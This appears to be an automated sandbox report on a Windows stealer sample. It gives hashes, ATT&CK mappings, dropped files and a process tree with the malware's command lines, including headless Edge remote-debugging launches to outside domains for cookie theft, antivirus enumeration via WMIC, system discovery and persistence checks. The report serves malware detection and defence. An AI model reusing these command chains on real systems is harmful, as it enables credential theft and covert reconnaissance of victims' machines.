bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags

arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
submitted
02-08-2024 02:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe
Size

8.0MB
MD5

7a9e91cd05bb23625354d0f46066904c
SHA1

7389f1881aba1c2ba3544321bd068bbf91dfa00a
SHA256

bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40
SHA512

cdcd8c13f582682279463afc1a6196b65e127a0cb344632f1c2222f8f64793ae8c19547758eda94ece0bc9526b6ed13e552c3f6c9dbc2c6f157e601cbbc95c65
SSDEEP

49152:BYyqyQ4SjTErF0JwHoLjhbi4zmkKm0W85GNLZLgKT/MNMNngOdTMnWAqkeKbr3kg:PgR2HoLtb

Score

8^/10

credential_access discovery stealer

Malware Config

Signatures

Uses browser remote debugging 2 TTPs 2 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
credential_access stealer

Steal Web Session Cookie
T1539

Modify Authentication Process
T1556

Processes:

msedge.exemsedge.exe

pid process

5116 msedge.exe
3512 msedge.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

a2-stl-0729-early-(1)-TESTED.exebbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation	a2-stl-0729-early-(1)-TESTED.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe

Executes dropped EXE 6 IoCs

Processes:

kedb.exea2-stl-0729-early-(1)-TESTED.exePsInfo.exePsInfo64.exePsInfo64.exePsInfo64.exe

pid process

1268 kedb.exe
3848 a2-stl-0729-early-(1)-TESTED.exe
3388 PsInfo.exe
3260 PsInfo64.exe
4716 PsInfo64.exe
2584 PsInfo64.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1268	kedb.exe
3848	a2-stl-0729-early-(1)-TESTED.exe
3388	PsInfo.exe
3260	PsInfo64.exe
4716	PsInfo64.exe
2584	PsInfo64.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

PsInfo.exekedb.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PsInfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kedb.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

PsInfo64.exePsInfo64.exePsInfo.exePsInfo64.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe

Delays execution with timeout.exe 17 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
2984	timeout.exe
4880	timeout.exe
4180	timeout.exe
3408	timeout.exe
4040	timeout.exe
3600	timeout.exe
3192	timeout.exe
3404	timeout.exe
2296	timeout.exe
2332	timeout.exe
2672	timeout.exe
2932	timeout.exe
3736	timeout.exe
4376	timeout.exe
2564	timeout.exe
4564	timeout.exe
3976	timeout.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

468 systeminfo.exe

pid	process
468	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

msedge.exePsInfo.exePsInfo64.exePsInfo64.exePsInfo64.exe

pid	process
5116	msedge.exe
5116	msedge.exe
3388	PsInfo.exe
3388	PsInfo.exe
3388	PsInfo.exe
3260	PsInfo64.exe
3260	PsInfo64.exe
3260	PsInfo64.exe
4716	PsInfo64.exe
4716	PsInfo64.exe
4716	PsInfo64.exe
2584	PsInfo64.exe
2584	PsInfo64.exe
2584	PsInfo64.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

Processes:

WMIC.exemsedge.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	4424	WMIC.exe
Token: SeSecurityPrivilege	4424	WMIC.exe
Token: SeTakeOwnershipPrivilege	4424	WMIC.exe
Token: SeLoadDriverPrivilege	4424	WMIC.exe
Token: SeSystemProfilePrivilege	4424	WMIC.exe
Token: SeSystemtimePrivilege	4424	WMIC.exe
Token: SeProfSingleProcessPrivilege	4424	WMIC.exe
Token: SeIncBasePriorityPrivilege	4424	WMIC.exe
Token: SeCreatePagefilePrivilege	4424	WMIC.exe
Token: SeBackupPrivilege	4424	WMIC.exe
Token: SeRestorePrivilege	4424	WMIC.exe
Token: SeShutdownPrivilege	4424	WMIC.exe
Token: SeDebugPrivilege	4424	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4424	WMIC.exe
Token: SeRemoteShutdownPrivilege	4424	WMIC.exe
Token: SeUndockPrivilege	4424	WMIC.exe
Token: SeManageVolumePrivilege	4424	WMIC.exe
Token: 33	4424	WMIC.exe
Token: 34	4424	WMIC.exe
Token: 35	4424	WMIC.exe
Token: 36	4424	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4424	WMIC.exe
Token: SeSecurityPrivilege	4424	WMIC.exe
Token: SeTakeOwnershipPrivilege	4424	WMIC.exe
Token: SeLoadDriverPrivilege	4424	WMIC.exe
Token: SeSystemProfilePrivilege	4424	WMIC.exe
Token: SeSystemtimePrivilege	4424	WMIC.exe
Token: SeProfSingleProcessPrivilege	4424	WMIC.exe
Token: SeIncBasePriorityPrivilege	4424	WMIC.exe
Token: SeCreatePagefilePrivilege	4424	WMIC.exe
Token: SeBackupPrivilege	4424	WMIC.exe
Token: SeRestorePrivilege	4424	WMIC.exe
Token: SeShutdownPrivilege	4424	WMIC.exe
Token: SeDebugPrivilege	4424	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4424	WMIC.exe
Token: SeRemoteShutdownPrivilege	4424	WMIC.exe
Token: SeUndockPrivilege	4424	WMIC.exe
Token: SeManageVolumePrivilege	4424	WMIC.exe
Token: 33	4424	WMIC.exe
Token: 34	4424	WMIC.exe
Token: 35	4424	WMIC.exe
Token: 36	4424	WMIC.exe
Token: 33	5116	msedge.exe
Token: SeIncBasePriorityPrivilege	5116	msedge.exe
Token: 33	5116	msedge.exe
Token: SeIncBasePriorityPrivilege	5116	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exemsedge.execmd.execmd.execmd.execmd.exea2-stl-0729-early-(1)-TESTED.exe

description	pid	process	target process
PID 4312 wrote to memory of 832	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 4312 wrote to memory of 832	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 832 wrote to memory of 2984	832	cmd.exe	timeout.exe
PID 832 wrote to memory of 2984	832	cmd.exe	timeout.exe
PID 4312 wrote to memory of 448	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 4312 wrote to memory of 448	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 448 wrote to memory of 4376	448	cmd.exe	timeout.exe
PID 448 wrote to memory of 4376	448	cmd.exe	timeout.exe
PID 4312 wrote to memory of 3896	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 4312 wrote to memory of 3896	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 3896 wrote to memory of 4880	3896	cmd.exe	timeout.exe
PID 3896 wrote to memory of 4880	3896	cmd.exe	timeout.exe
PID 4312 wrote to memory of 540	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 4312 wrote to memory of 540	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 540 wrote to memory of 2564	540	cmd.exe	timeout.exe
PID 540 wrote to memory of 2564	540	cmd.exe	timeout.exe
PID 4312 wrote to memory of 3612	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 4312 wrote to memory of 3612	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 3612 wrote to memory of 4040	3612	cmd.exe	timeout.exe
PID 3612 wrote to memory of 4040	3612	cmd.exe	timeout.exe
PID 4312 wrote to memory of 4220	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 4312 wrote to memory of 4220	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 4220 wrote to memory of 3404	4220	cmd.exe	timeout.exe
PID 4220 wrote to memory of 3404	4220	cmd.exe	timeout.exe
PID 4312 wrote to memory of 752	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 4312 wrote to memory of 752	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 752 wrote to memory of 4180	752	cmd.exe	timeout.exe
PID 752 wrote to memory of 4180	752	cmd.exe	timeout.exe
PID 4312 wrote to memory of 2284	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 4312 wrote to memory of 2284	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2284 wrote to memory of 4564	2284	cmd.exe	timeout.exe
PID 2284 wrote to memory of 4564	2284	cmd.exe	timeout.exe
PID 4312 wrote to memory of 5116	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	msedge.exe
PID 4312 wrote to memory of 5116	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	msedge.exe
PID 4312 wrote to memory of 5116	4312	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	msedge.exe
PID 5116 wrote to memory of 1232	5116	msedge.exe	cmd.exe
PID 5116 wrote to memory of 1232	5116	msedge.exe	cmd.exe
PID 5116 wrote to memory of 4848	5116	msedge.exe	cmd.exe
PID 5116 wrote to memory of 4848	5116	msedge.exe	cmd.exe
PID 4848 wrote to memory of 4424	4848	cmd.exe	WMIC.exe
PID 4848 wrote to memory of 4424	4848	cmd.exe	WMIC.exe
PID 5116 wrote to memory of 2236	5116	msedge.exe	cmd.exe
PID 5116 wrote to memory of 2236	5116	msedge.exe	cmd.exe
PID 5116 wrote to memory of 3792	5116	msedge.exe	cmd.exe
PID 5116 wrote to memory of 3792	5116	msedge.exe	cmd.exe
PID 3792 wrote to memory of 1268	3792	cmd.exe	kedb.exe
PID 3792 wrote to memory of 1268	3792	cmd.exe	kedb.exe
PID 3792 wrote to memory of 1268	3792	cmd.exe	kedb.exe
PID 5116 wrote to memory of 2532	5116	msedge.exe	cmd.exe
PID 5116 wrote to memory of 2532	5116	msedge.exe	cmd.exe
PID 2532 wrote to memory of 468	2532	cmd.exe	systeminfo.exe
PID 2532 wrote to memory of 468	2532	cmd.exe	systeminfo.exe
PID 2532 wrote to memory of 4560	2532	cmd.exe	findstr.exe
PID 2532 wrote to memory of 4560	2532	cmd.exe	findstr.exe
PID 5116 wrote to memory of 3304	5116	msedge.exe	cmd.exe
PID 5116 wrote to memory of 3304	5116	msedge.exe	cmd.exe
PID 3304 wrote to memory of 2296	3304	cmd.exe	timeout.exe
PID 3304 wrote to memory of 2296	3304	cmd.exe	timeout.exe
PID 5116 wrote to memory of 3848	5116	msedge.exe	a2-stl-0729-early-(1)-TESTED.exe
PID 5116 wrote to memory of 3848	5116	msedge.exe	a2-stl-0729-early-(1)-TESTED.exe
PID 5116 wrote to memory of 4552	5116	msedge.exe	cmd.exe
PID 5116 wrote to memory of 4552	5116	msedge.exe	cmd.exe
PID 3848 wrote to memory of 3928	3848	a2-stl-0729-early-(1)-TESTED.exe	cmd.exe
PID 3848 wrote to memory of 3928	3848	a2-stl-0729-early-(1)-TESTED.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe
"C:\Users\Admin\AppData\Local\Temp\bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4312

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:832

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:448

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:4376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:4880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:540

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:3612

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:4040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:4220

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:3404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:752

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:4180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2284

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:4564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=old --disable-gpu --remote-debugging-port=0 http://trujillolauriannelamar.com
2⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo %userprofile% > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout 2>&1
3⤵
PID:1232

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\485 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:4848

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\485 > C:\Users\Admin\AppData\Local\temp\385
3⤵
PID:2236

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit" & kedb.exe -o bxlg.zip
3⤵
- Suspicious use of WriteProcessMemory
PID:3792

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\kedb.exe
kedb.exe -o bxlg.zip
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\chg 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:468

C:\Windows\system32\findstr.exe
findstr /C:"OS Name"
4⤵
PID:4560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 60
3⤵
- Suspicious use of WriteProcessMemory
PID:3304

C:\Windows\system32\timeout.exe
TIMEOUT /T 60
4⤵
- Delays execution with timeout.exe
PID:2296

C:\Users\Admin\AppData\Local\temp\a2-stl-0729-early-(1)-TESTED.exe
"C:\Users\Admin\AppData\Local\temp\a2-stl-0729-early-(1)-TESTED.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:3928

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2332

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:840

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:3600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:1612

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:3408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2952

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:3192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:3336

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:1560

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:1144

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:3976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:3384

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:3736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=old --disable-gpu --remote-debugging-port=0 http://annetteedgardomalcolm.com
4⤵
- Uses browser remote debugging
PID:3512

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo %userprofile% > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout 2>&1
5⤵
PID:832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit" & kedb.exe -o jucq_x64.zip
5⤵
PID:3240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe -s /accepteula applications > "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\bijjc"& "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" -s /accepteula applications >> "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\bijjc"
3⤵
PID:4552

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe -s /accepteula applications
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3388

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
"C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" -s /accepteula applications
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe -d /accepteula processor > "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\bijjc" & "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" /accepteula video >> "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\bijjc"
3⤵
PID:3632

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe -d /accepteula processor
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4716

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
"C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" /accepteula video
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:3080

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:2196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:1948

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:4480

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:4424

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:1816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:740

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:4964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Modify Authentication Process

T1556

Privilege Escalation

Defense Evasion

Modify Authentication Process

T1556

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\a2-stl-0729-early-(1)-TESTED.exe

Filesize
8.1MB

MD5
8b3fa98b86bffc7afadc849f095e3790

SHA1
661d8c3946e42774f4d56ed48f7b3df55e1ef27f

SHA256
3c5b47bcb27e9647fa54cf436d454a22c7e85dbe8681af8acd121c7928ab8c92

SHA512
a840419728557874789d5cc5e5387ba06b784fa996bab96049676ab4d8316cbd24cdd470002047d7128843ab8151775325f4e3ebbc7dfca641dc051118569fba

Download Submit
C:\Users\Admin\AppData\Local\temp\485

Filesize
32B

MD5
b65e9213dae00101a52d72b56120ff81

SHA1
d52caec94e56a19cca2bcc6e38dc780b1cb90027

SHA256
dfa7c49d13da53cc057bce84a0944d83258bf61671f92b2f7d0d9ee3e3896740

SHA512
09daf8969898babaaaa9ae8959b5345e204a27ff7b84f0bfb696b1e25130a9f659519a040eeaeae74c8c091586e76a6150743b30f419c0b1952c24c6c227584e

Download Submit
C:\Users\Admin\AppData\Local\temp\clfb

Filesize
16B

MD5
b1ee3fc6ec4681dda580f6e911d9436f

SHA1
87a72d824a3788f19febbb863049afce981222be

SHA256
bd855b46dfb470ce12bbffa2f4d50534ca722a4ca834bd24bc7ceb471e4d6f0e

SHA512
ed5be398a0f8094d86196eb886b2ba9cea2edb998dd3fc47cf0d8f6d32c5ea37f8ab8161262a6717785335368cc16cd728505a1f58c082c3c143547a4051988a

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\1E3D6E

Filesize
202B

MD5
107eeb6b13aa13f0554c7e8d35eefa45

SHA1
a911a8991ac639fe15ae91f9b4d190ed38d21a84

SHA256
5f664a619327134f5e45d2669bd188932326806e4434d9c34bffc7fa8ed5c168

SHA512
c3523ee034a4513f15bbd73bc33ecc0fa663ce8b1ebacadeaff29dc52dc89c6f06b5cc9e355ae6dbdbf9b856a74e5e66e426b7d2a50b88ba679330dc3b4a206a

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe

Filesize
306KB

MD5
624adb0f45cbb9cadad83c264df98891

SHA1
e839ce1e0446d8da889935f411f0fb7ad54d4b3e

SHA256
8f401dc021e20ff3abc64a2d346ef6a792a5643ca04ffd1f297e417532acaa06

SHA512
b29b3a72cd32ee34ec6ce357818658b8a89c399e2f8439a7f49fb1a506ed912f41afa19bc5c142c9a4539acc5966a29c6a6637c23de0dc3e5f2d85264620bdba

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe

Filesize
343KB

MD5
efa2f8f73b3559711149dfdeb8bc288e

SHA1
453c70e4b12ecabe860866165ad39de6361215fd

SHA256
ef5cf80c8448bf0907c634a3251cc348b1d36bb5ad8f31f23b11d12aa7f63bcb

SHA512
63f75a3d639a912e2e3966e9d410f8e1c52b75300518bb5083853ef2633c7e109c037ea2b66ced57bd5b319866a14bcd92254cb38ab9ec7b99465b0a8a8f5f3e

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\bijjc

Filesize
3KB

MD5
97eed379f867eaa5093299a4a166e90a

SHA1
d3e5750ba832c0cc0bbd98ee1f3ba6b9b60e39f5

SHA256
d18ae3fa07b7ca9e18efdd297b034afaf64e2959faf22433087c3d4c98c1f845

SHA512
daf75ab5522cdeb82edf0e062293f24fb79d8701bc5fcaa64769ba17b79076d63c1459ad7455a88df6d2f674a0afff475eba9956df956d72b33b35266dc0a5d5

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\bijjc

Filesize
